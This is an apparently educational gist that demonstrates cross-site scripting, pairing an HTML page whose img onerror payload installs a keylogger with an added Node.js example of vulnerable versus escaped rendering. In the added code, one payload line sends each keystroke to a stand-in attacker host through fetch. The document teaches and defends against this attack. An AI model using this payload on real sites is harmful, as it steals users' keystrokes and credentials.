Created
March 23, 2022 17:33
A simple demo of a cross-site scripting (XSS) attack.
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>XSS</title>
  </head>
  <body>
    <script>
      // Demo only: the markup below stands in for attacker-controlled input.
      // In a real attack it would arrive via a URL parameter, a stored comment
      // or any other untrusted source that the page writes into innerHTML.
      document.body.innerHTML = `
        <img
          src="x"
          onerror="document.addEventListener('keydown', event => console.log(event.key))"
        />
      `;
      // The image at src="x" cannot load, so the browser runs the onerror
      // handler, which installs a document-wide keydown listener (a keylogger).
    </script>
  </body>
</html>
Open this HTML file in your browser and have a look at the JavaScript console. Every time you press a key, it will be logged to the console! The image never loads (its src is just "x"), so the browser fires its onerror handler, and that handler registers a keydown listener on the whole document. The demo hard-codes the markup, but in a real XSS attack the string that ends up in innerHTML (or any other HTML sink) would come from input the attacker controls: a query-string parameter, a stored comment, a profile field. Now imagine if, instead of just logging it to the console, the attacker sent everything you typed to a remote server...
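The following is an added example and not part of the original gist. It reproduces the gist's payload under Node.js (no DOM required, the sink is modelled as the string that would be assigned to innerHTML), puts the vulnerable rendering path next to an escaped one, and adds a small check that a test suite can use to confirm the fix held. The host attacker.invalid, the function names and the exfiltration URL are assumptions made for this example.

```javascript
// Added example (not the gist's own code). Runs stand-alone with node.

// Constructed attacker input: the gist's image-onerror keylogger, with the
// console.log swapped for an exfiltration request to a hypothetical server.
const PAYLOAD = [
  '<img src="x" onerror="',
  "document.addEventListener('keydown', ",
  "e => fetch('https://attacker.invalid/log?k=' + encodeURIComponent(e.key)))",
  '">',
].join('');

// Vulnerable sink: untrusted text is concatenated straight into markup. In a
// browser the result would be assigned to element.innerHTML, the <img> would
// fail to load, and its onerror handler would run with the page's privileges.
function renderVulnerable(untrusted) {
  return `<p>Hello, ${untrusted}!</p>`;
}

// Fix: escape the five HTML-significant characters before interpolating, so
// the attacker's text is displayed literally instead of parsed as markup.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}
function renderEscaped(untrusted) {
  return `<p>Hello, ${escapeHtml(untrusted)}!</p>`;
}

// Equivalent fix when you already hold a DOM node (browser only, so it is not
// exercised here): write to textContent, which never parses its argument.
function renderWithTextSink(doc, untrusted) {
  const p = doc.createElement('p');
  p.textContent = `Hello, ${untrusted}!`;
  return p;
}

// Cheap post-condition for tests: does the rendered markup contain a real tag
// carrying an on* handler attribute, or a <script> tag? Escaped output holds
// only &lt; instead of <, so the tag pattern cannot match. This is a test
// helper, not a sanitizer; do not use it to clean input.
function containsActiveContent(html) {
  return /<[a-z][^>]*\son[a-z]+\s*=/i.test(html) || /<\s*script\b/i.test(html);
}

// Stand-alone demonstration of both paths.
console.log('vulnerable:', renderVulnerable(PAYLOAD));
console.log('escaped   :', renderEscaped(PAYLOAD));
console.log('handler survives? vulnerable =', containsActiveContent(renderVulnerable(PAYLOAD)),
            ', escaped =', containsActiveContent(renderEscaped(PAYLOAD)));
```

Escaping at the point of interpolation is the right fix only when the untrusted value is being placed in HTML text or a quoted attribute; a value dropped into a URL, a script block or a CSS rule needs the encoding for that context instead, and a text sink such as textContent sidesteps the question entirely.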